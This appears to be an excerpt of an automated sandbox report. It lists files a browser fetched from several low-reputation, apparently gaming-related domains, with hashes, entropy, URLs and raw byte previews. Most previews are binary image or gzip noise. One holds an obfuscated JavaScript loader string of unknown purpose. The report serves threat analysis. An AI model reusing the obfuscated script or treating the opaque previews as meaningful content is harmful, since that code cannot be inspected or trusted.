                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:sx/d21srklvj4IRBmCa//Jt4dhIODq1S9I6W3gf:AOB3a/Rt4dhIsRI6W3gf
                                                                                                                                                          MD5:2BCE0C91243A8C6AF9F2734C62046E91
                                                                                                                                                          SHA1:C54D733AF6149D9B9C125909BE19D7E08E23EB00
                                                                                                                                                          SHA-256:C2C44236B6B88D17AAF3385171CE1A7BBAD8CF9AAC5428E4995F13EDBA258E1D
                                                                                                                                                          SHA-512:8363D759CD2B681E3532B00551DAE280C0A8F3091357E73B02F2005B37EF845FFD091FEBA14FD76AED841B4BD25CEC3ACEB1831090C0CB0FD0A4596765EEC631
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/gc_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E61647D6616311E7A4EABB69A1A4E81E" xmpMM:InstanceID="xmp.iid:E61647D5616311E7A4EABB69A1A4E81E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7337d2d7-b8b5-bf4f-bdae-fe34287673e4" stRef:documentID="adobe:docid:photoshop:1ae07fbb-6062-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 265 x 110, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25015
                                                                                                                                                          Entropy (8bit):7.980690323700889
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:HoPQbfTZUOVEdf0OBPX+CQW9wjdwKjwKJkNfXJ7u:Hk+NUn/gCryjvqJu
                                                                                                                                                          MD5:BC1F4F5F63370611E1D02DB6965C322E
                                                                                                                                                          SHA1:A8E81128DD3A20903E8B86218B71423DB1836F2A
                                                                                                                                                          SHA-256:752255E2AF92BF5C380D5A5F53D7667A0303A9760362EED4ADA8EA027B5154BA
                                                                                                                                                          SHA-512:7915CE1F9A0424A688C7465C7EAE6F61A197CB3CC5C5B3AE694810BA61526E329F6C47E4D0BA0F3046881FD93080584F3C9D1FA726211A5663146F26C61D5CB1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_1.png
                                                                                                                                                          Preview:.PNG........IHDR.......n.....4..2....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:da81c61b-551b-4bf2-9f22-ed39bb7c336b" xmpMM:DocumentID="xmp.did:EF2B064C1E2D11EEA737E951EC38508F" xmpMM:InstanceID="xmp.iid:EF2B064B1E2D11EEA737E951EC38508F" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2662a110-a5c3-4818-8e4c-a76e6f5e550f" stRef:documentID="adobe:docid:photoshop:5a7091ea-5cf8-ec4b-8d07-c87cf5230b9d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..6..].IDATx..}....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1663
                                                                                                                                                          Entropy (8bit):7.227069440381623
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Z1hNo7FCWwjx82lY2T3/VtutnAyJ3VtTtNRGnNGt9RlDSCWoHgTzWmuDAsQK81M1:nzo7FDNn2D0J3hD5nATXCjl7PrN7
                                                                                                                                                          MD5:E0C729B429763EC4769854793033211D
                                                                                                                                                          SHA1:578A8A468E66F7911C9230AEA7A6E4048BE5D70A
                                                                                                                                                          SHA-256:9F07B480C84492E65AEBC6BD303587C1B979C53DF555E3BCA1FECC5690829DC3
                                                                                                                                                          SHA-512:1B5247929E7333191176626DFCADAB2B9B92F007C29B1F4CC35247E153C7D71253291896D5F71F5CF2939FC615EE7AEE11CA6017EB98AAD32DC17F4395EE26E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8D68411A6D711E9ACBEB1FE1B090C8A" xmpMM:DocumentID="xmp.did:A8D68412A6D711E9ACBEB1FE1B090C8A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8D6840FA6D711E9ACBEB1FE1B090C8A" stRef:documentID="xmp.did:A8D68410A6D711E9ACBEB1FE1B090C8A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...v....IDATx..V]HSa.>.9.wN7..J.i).~.....(...Q.T`..^.D]ta..A.M].T.u.....0..0P3'6...Pg..9.9....,..~B..|..}..{..{....vls.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 117368
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19659
                                                                                                                                                          Entropy (8bit):7.986741631019542
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:LhS5Hs/1NotC0O5tbj1Koyw7kioIQgp51SEZIb+HDVBDSci:d6H01eCDPv1Koyw1bVp51So7Pi
                                                                                                                                                          MD5:ABA756C14574AD2583F2C2208A43F6F4
                                                                                                                                                          SHA1:4A82F3DB1F58AD88C130B5A64B9750EB6FB904E6
                                                                                                                                                          SHA-256:CF69493A023C7ED0D84A9E94865B90B3D268BAA9D1FABC68F7548048836556CC
                                                                                                                                                          SHA-512:9BFD3E8089C79AE223F1E95E0A8FEA5109DAEDCF9072A0E62F723A49D75B943F4570EB74CFB953BE37BABD961F5001FB2DF12A7C69A3C077420B16E47F0A0009
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css
                                                                                                                                                          Preview:...........}k..8.._.TGGWM..Y~.3..fc7bw?.~..p..}..$.5-[.I.G;|...&...........4.. .. D...P^v...CQ~{l.c3i..=M..._.v.._.IS..O../.}.E..O.CC.\.U..rH....]..-.2.'M...,o..l..%MNmQ....:.....>O2....:...8....<>&..M.........dEs*.o..J..&..ir..4.S]..y.?.^+.Y...OD...9'-)'IY....I..Z...X...J.g.l~.`P..c....}.F.............kr.&.|,.l.VeU?.5..)..c{M..6..9....s..-'..m...j.....l...d...:<.N_G..3..q..;.H.~.Dm.2.f..,l.oe.X.l..u?.r....a.=I.&..8?\Y..I.wQ.=Y.....ksHJ......vsfT.O.S..\:.u.....p...?..k..y.1...q2]2z....d......x.|~.bz...|.p.......U*...w...^....U|[}...G.r&.^.t..-TG._O.GCHrn.kZ1..u.1...Mr89..P.+..i>6...1...3c.q\.O.v\.Z93...l....t)1.M4fz.gS.}.....H.fJ....ESlK].._........l9..c$....v..|'...2....EeL....^4...)OX'i.(.<..a....q.V]..V.h.~....j...\......J..8..."...S.e\.L....T.#.CR^.x.}...d....e...(.....*..P..p<..y...6,...9.... <[z\x=K..;.c.J...^7{....*.+r..Q4X.e.$.Jj..&Y.Vu...J#.....&.....j4..b.5..'=.G... .V7UYd.......K~.(]3S.]>......6.|....).S.?.?.m6n....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2420), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2420
                                                                                                                                                          Entropy (8bit):5.856048414347346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VZKvKeMdRFbAszrcMZl/lDdyYOMXk7/+ca9Ul6BtjoqDwtyL/M3jJzj:VZ6kt7MMZPDdGT7faugXocw0QjJzj
                                                                                                                                                          MD5:D0253BD63703C7321F43D65407F87466
                                                                                                                                                          SHA1:BC0F6F7B93BE14AB47BB8490202DAE6AFF1E057B
                                                                                                                                                          SHA-256:63A967C62D945FDB951D41155419CCCBF9E4622581735310807B1601A43A6ADA
                                                                                                                                                          SHA-512:A156B96AE5F596521AA60281AB597E97697C3A7530CFA71D93880DC8B081328075E9972F9418C2A3EBBFB014F736CE5CA0D4A4F61FFE0D1D3A75B353B15066A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/menu.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgEYBdAGgG8AiAegE8BRAGUoC4AzAVzRgBcBLdJh6k0pEAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp61MoygH0XIJAFkUhjgBsQSgoANyg/DhAWAEIABgBfcTVQxVkoAF4QTEoYmAg2SnFSPjTyGBQAWwh0EDQeJBZycpqOAGUOMHYuXgE0TElFEB4ORTRZEH1MwgBmKYB2cX0eAAsazHGwM0Mnfz9SSm0/AAkAcwLxOLjSQygeKE7ufkF+weG0cjQoYIbLpZRgu2ihAupDKlQ4PBAhgaHya926T3IAyGI1SRhMUH8PH0AFV+H59E00BwAEoocEgAByUCaQiWfCQ+gAJNZyfoYRJgU1lj56uRjoNPFAAB5wx69HjPZGjGJpNLLelsz4E4UAfhiLB4AB9NfKGR9gsqhZd6QBhPwqOCinpCSTJWRoNKMoSLKCKfkS/Q3JRZGB+KBIJAFNRoABkIbQ+k2ICFGjYWQAQgBJCkAERcBTDUSdlH0CkUUD4xyWPAK2BixDDToA5Ng+IYAHppShIdqeZrp4gsYL0vhgAJVhZIc3GbFYABMMRi51I7rNUAAXvOrYIJeQ+HGsXWw5goljzQptTLZXv6XuasdltrKJ56BTsS4TYxEyaANKUKLHul6pW+hfz8TiEirzUJgSappqxIaNiAAq9DEuI1CLB4PDOr+i6LCgo62IoJr+pkAEqpQrBQGibAYn4WLxps+hofOVFoFsm6GNO7ptGAiZQpwDzWquQEojwKpYgMEB+jAmTUAAOtQ1DHHs6biCwRGXO6hwDGwy7ipKryosYZGYvo9GGPo5poHAhnOksannJcMADDckIaX05B2jwcpfiIaTAJsKDAPoLQvsmaiZJQhAAILaKc4hZPo1CUAA1GgcU0FGQr6NogYLMsqxcfCvRoLarpjGkEaEhwahYoy5hCjw0EWpgOVik
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 72105
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17861
                                                                                                                                                          Entropy (8bit):7.987401439888671
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:U/Q5U0yn7Mm3p9xEC1eQDAOZgnAoT0/Zdrb8knde4EHgtyrxfkb+:UYb07Mm3p9V15WAoT0/Zdrb8knQ4DyrP
                                                                                                                                                          MD5:D86AEF4B07AF18D77E8F9966F285AD30
                                                                                                                                                          SHA1:7DDE81A54FCE17231F43CDF55FE8E9A87C12EC4F
                                                                                                                                                          SHA-256:EA6330A775014717DDFB3069F62E606129648324C0F725119BAC4DFD5B5609C7
                                                                                                                                                          SHA-512:51C89A1304C7533C6D8B548660BF239A75BB1987D509A6914998CB965EE60A115A41041F733E79B09A88B95AE11EC93E67572243B5C4319ADD4EA1435D9C2127
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/bootstrap-daterangepicker/moment.js?v=1717580749344
                                                                                                                                                          Preview:.............[.u..W...y.....rI-.K..Y~(.......S......2.f....,)..8._^9.l.9r..b..U..I.*...........{.b.+.....O.s......_.K....`2...'..at.=.Of....t.L.....l..q.L..O.....D.&..ar.b...p0NzA..UE&.JaC......!...Q..%...g.:.....[...A...g.tgk.....p..=x.Tqk...0..t...}..gc...N.....p.ugG.b..5.4...K.....\b.6....l.=-....N.1..:.M...Nu>....*r.d....~..t...Vw.d.R.......%.8..+..dvb.....1.z...n'.4.'.. .5.7!.:L.G.~.\.`....8...H.;..0\JF!.p.w..'.g.H$./...Kf.S.;..N..y2.1....u..X...d%...9.B..}..\f..%.....}..'..;<N..2...@.T.&....$.w<?....wv.p}D..Qw..'P.$J!..S......V.D..q.V!..%)hj......,....v.L.8KF..i.;L..x|.&...d.6..9......dv8..4*..A..=L....E...Y.. .A.=....ji..K.V.......=E.N.ki.p....Q%..{..8F......U.A(.)%..7H.1~...P.Q...Q..E.B.4H.u.!.^.0w.......D[U.Y[_.. ....".@-.,..QC3.lrA.&Y.4.*cNUB.PS..:H{....G.'.H....%hI%'mVg.k.X..G....LC,..^.:.....9....|tVP1....%. .z.....j.g.c......d|88*.'..l2..."......q..QX...;Bw..1z.C.....c/+E.C?.....a.}.C...0......F.Q.?..H..k.|.SP!.8!"..r...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4627
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1163
                                                                                                                                                          Entropy (8bit):7.840917616071798
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:XQY/Ntb79eamFnmO6Ym3lbkp518uFjO7UY+NycWBcJFq7uB7+p6OPJ3ChtFa4:XLv9FS76nbkp3PehvAMV6OPUNf
                                                                                                                                                          MD5:2FF7585D68BC406EC33509CBA6DFAA2B
                                                                                                                                                          SHA1:3A8CAD4B27554C427AAC87EDF157FDD072F9795E
                                                                                                                                                          SHA-256:CFCB96383165A2EDF48B0F084D9B1C77BC44FD2631BDAA2F1DFE975A2501BF4A
                                                                                                                                                          SHA-512:76C45EB4ADBD8B16589167C91BB248D22D7DEE7A178FEC8070B780A0B452FB32BC0C0F19EE62034F80BA2D24CAE1E2EC50D96FAEA4B444A63D5E954593342B15
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/error.css
                                                                                                                                                          Preview:...........X.n.6....>$....\N..........`....8..A...m GS5Q4...X...4.IvM..7..%...DX............jw...G,........u..A.F\......Dw..p..T.$.../{...^....".x`.....\Ptx.p..C.J.:..,...S.....M......y?...o...o...hH.YS.k..F.q;...6..;..qk......'.>Q..$.Nk.._....tx...-...B<u.i.x2.!R...-........:~P.V.....L.4".7Hb...AR..g.P.^...`B....g..Q9Y0...[+.N.E8Q..d..t.O.tM..5 #>.".....5 #M.9ML.Q..-.c'9g...R2qa..q3..T..X.s....M._.Z...*..3...j.V1.e.&.U.e),..1.p....._......V..`1....S...K...F....S.....<.,f.......g.j..4..s2.).7....t..E.e=*K....E?..g\.N@..d.J;...Z.8..8:.....&6O.W-..M1.......{C.m..ni..j..@..vx.X.....-..s|p..um. R.&y......mn~...i..M..7...rs..R.F.ss;..82...!............R4...S.......F........yh...<.....z,.Y...+Csb{D.\E90...8{...z....;.9.....z.O__..8.1R'6s.m=.. ..d...w.s9...d@a....^&F.....A....*..#g@I....v....%.........1u$.3....3.g.2.L..bc...S..E.u......qY...b....}..Oy#O...kp..}..1W..t.....!.]J\5...E......Uz.o.G-.......j...Y.MS..Q.^}.RY..3d..Pe. ...n...r
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1333
                                                                                                                                                          Entropy (8bit):7.525854715934
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:leE1iEuR3QTVkhxMxUzzO8CKhM1tUYNGrYzPX2YP8TWbFdd3U855e4:AES1IuPCKwtUYNYw18TIFdd3U855F
                                                                                                                                                          MD5:003485B974AACA853F5281CD4B21C5A2
                                                                                                                                                          SHA1:05D49CAB4EB91487597F1D6C261EF86B5E6EC244
                                                                                                                                                          SHA-256:3EBAF1E2AF96D7AB74F83F1075BA6875CFE32BE8809E9405B67EFD6C2FADBE58
                                                                                                                                                          SHA-512:3118ACAB3D915F7577E81DC13A75D6E3BD81A346870C77E1BDB0B62CF2553AAD101F4B8D927B28ACB5241ED4019B76B1EF1A023996F7EE828AFE48B11E5A5381
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_bs_w.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...<...+'.<<..8.;;N..<...;;.::.;:...<...<<;...98....;;.98.<<.<<.:;...::=..<...448..<....7...=...<<=...<<..8<......<<<....8.oo?....8.;;.97;...<<..7.<<;....:.@E=.....=....86..;..\w..447..:...<<.Y...7=..;..5...849....4........8.TT.yy....bb....zz.<<..8.<<=...=....8.88.<..=.....=...<<....8.;.<<:...<.KK..8=.......<..E.......8Xx....=......;:.<<....<<....:..8...=...''.5.........8....<<=...::....99..8.......77...........uu.hh.dd.............\\.TT.LL.FF...................zz.``.DD.??...................oo.mm.XX$.&.....tRNS........}O...ti........T>1...................vrnkebZSLEB>76)"!.......................................{ph`_[VUTJB@410//+''$#"...N.T...DIDAT(.m.ew.A..'K....J...]...................].{Ny>.s....3.C_.1..m.Qq..9....:_...m.......2.....V{..y...%9t...-....A.NJ.9...:..NL....Y.8.Tn.35..b.q.fd..O...]_O..j..S.o......z..h.......-...[..gy=Rq....#...}Kn.x.O.V....o...$E...Tk"~N..HYFf.B3Na....."KY+0NN.0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25956
                                                                                                                                                          Entropy (8bit):7.970174820456842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:sx/d21srklvj4IRBmCa//Jt4dhIODq1S9I6W3gf:AOB3a/Rt4dhIsRI6W3gf
                                                                                                                                                          MD5:2BCE0C91243A8C6AF9F2734C62046E91
                                                                                                                                                          SHA1:C54D733AF6149D9B9C125909BE19D7E08E23EB00
                                                                                                                                                          SHA-256:C2C44236B6B88D17AAF3385171CE1A7BBAD8CF9AAC5428E4995F13EDBA258E1D
                                                                                                                                                          SHA-512:8363D759CD2B681E3532B00551DAE280C0A8F3091357E73B02F2005B37EF845FFD091FEBA14FD76AED841B4BD25CEC3ACEB1831090C0CB0FD0A4596765EEC631
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E61647D6616311E7A4EABB69A1A4E81E" xmpMM:InstanceID="xmp.iid:E61647D5616311E7A4EABB69A1A4E81E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7337d2d7-b8b5-bf4f-bdae-fe34287673e4" stRef:documentID="adobe:docid:photoshop:1ae07fbb-6062-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 31598
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6253
                                                                                                                                                          Entropy (8bit):7.965593985492808
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:QSkfG167Bu5ZrwzirEAgpc3xYxKOE5SSFdvB4+KICQVbh0TAjA5LYzLyrGYr+D:Hk7E5SziriKC06gdvq+K7Qh0EcYCrH6D
                                                                                                                                                          MD5:E666CF1062741A4581B58C2AE792D7EB
                                                                                                                                                          SHA1:255167DC4785FC969942025F42003834B2F24B1C
                                                                                                                                                          SHA-256:765C303DF0B554CAD00EEA0223262C1A4C201218CC6109393C16A70C3D748B6E
                                                                                                                                                          SHA-512:61C830F7C1637EFD149F59F63E9C2F9A3D0EF5F52989327B6B9B6F6205976E6DAFC47594387392F366F75808E5D912254133E129FC26281AD2B02791E3CBB3D2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/commonPage/themes/gui-skin-default.css
                                                                                                                                                          Preview:...........=k...q..+.....n......>.G.rhK|X$e}.....qvf13.....I.+..p...# ..._....$.m.....O....L?j.{R.................g._...7...-w...'.n.....}.M.U.Y[.~../....W/~.......~......../?../..3VK.?EI...n9.!)8\e.8.Y.2..E..!k...4@..q.{.3.;m\w.Pq5...$^..q.Z.......'_..?...?Z......<7A....e..(."dO..{2>..l>r.s....~X......i6.,O..,...v.`.....h<...%v./G......zi...o.h(...EQ.%n..1mQ&@h. .Y...Z....e.....(A...O.Y^.i..B4...*]...<r$...V..w.;\ehLho;..1...?...G'.....Fq...0v..../... ....l..~..F}...M>..a.fv..b...8..gh...3t.qYS...{2K.U..^.b=ys:.rqQ.LRoz.....r..'..yk..C6 .<..]e..k...i..[s%........+....h...E..O~5..ap..j..Q....w.,....h.gs&.cFC.'.7.SM.d.z....w.?..y.!.+.G.}..K......0....#/N\.0t.xO.....\...c.+.N.j.4. ..r.b.v...A...;....VT.P'.(.........4XSlGQ.,..WA..).L.Y..n<.M..fS.;.;...i<.Z.....g.E...5u..m..U....H...?k.K..hfDQa..Z.>...6..P.#.kn...69..%..f.I.......z..Y.....'..+tbU..,^..bO.+:.b.........[.v[..t.&6..f.X9.....!G,,. s..*...."..1.p. @...../B..i..]`.B.....T.:.@6..e.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (12652), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12652
                                                                                                                                                          Entropy (8bit):5.848044998641039
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VruTEUCbhhZUvZZsPqhi0BXyT+WY/6bb0cpJo9hk:luQvhhZUvEwiUJW4epJo9hk
                                                                                                                                                          MD5:34E8A692B9EEA69394E43D9DC7CC4766
                                                                                                                                                          SHA1:9C9799B3BA0300204F0E2D93ECC2E4E938BA6CDF
                                                                                                                                                          SHA-256:2E48302B1946752C5E535A945A6878896B7B7D829FAB058616A1CD73E57C053B
                                                                                                                                                          SHA-512:D7717ADFE44DE60792F33E7A13C444A6B7823341413ABBD7731F4B555DA09CF7474624624A141F0795767F6AF8A768A85F2CF2285A4216873A3B4855C0A03A2A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4044-index-js.js
